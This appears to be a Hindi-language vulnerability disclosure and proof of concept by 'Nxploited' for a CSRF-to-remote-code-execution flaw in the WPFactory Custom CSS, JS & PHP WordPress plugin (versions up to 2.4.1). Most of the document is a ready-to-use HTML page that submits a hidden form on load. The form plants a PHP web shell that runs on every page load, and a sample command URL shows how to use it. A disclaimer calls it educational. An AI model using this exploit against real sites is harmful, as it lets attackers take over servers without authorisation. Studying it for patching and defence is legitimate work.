
WordPress कस्टम CSS, JS & PHP प्लगइन <= 2.4.1 - CSRF से RCE कमज़ोरी
WPFactory कस्टम CSS, JS और PHP प्लगइन में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) कमज़ोरी अनधिकृत POST अनुरोधों के माध्यम से दुर्भावनापूर्ण PHP कोड इंजेक्ट करके रिमोट कोड एक्ज़ीक्यूशन (RCE) की अनुमति देती है।
यह संस्करण 2.4.1 तक और उसे शामिल करते हुए सभी संस्करणों को प्रभावित करता है।
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:Hनीचे एक स्क्रीनशॉट है जो सफल शोषण का परिणाम दिखाता है, यह प्रदर्शित करता है कि URL पैरामीटर के माध्यम से रिमोट कोड कैसे निष्पादित किया जा सकता है:


<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
<p>By : Nxploited | Khaled Alenazi</p>
<form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
<input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<noscript><input type="submit" value="Submit"></noscript>
</form>
</body>
</html>
plugins_loaded हुक के माध्यम से यह कोड हर पेज लोड पर स्वचालित रूप से निष्पादित हो जाता है।http://target-site.com/?cmd=whoami
यह PoC केवल शैक्षिक उद्देश्यों के लिए है।
इस जानकारी के अनुचित उपयोग से होने वाली किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।
हमेशा नियंत्रित वातावरण में और अनुमति के साथ परीक्षण करें।
द्वारा: Nxploited | Khaled Alenazi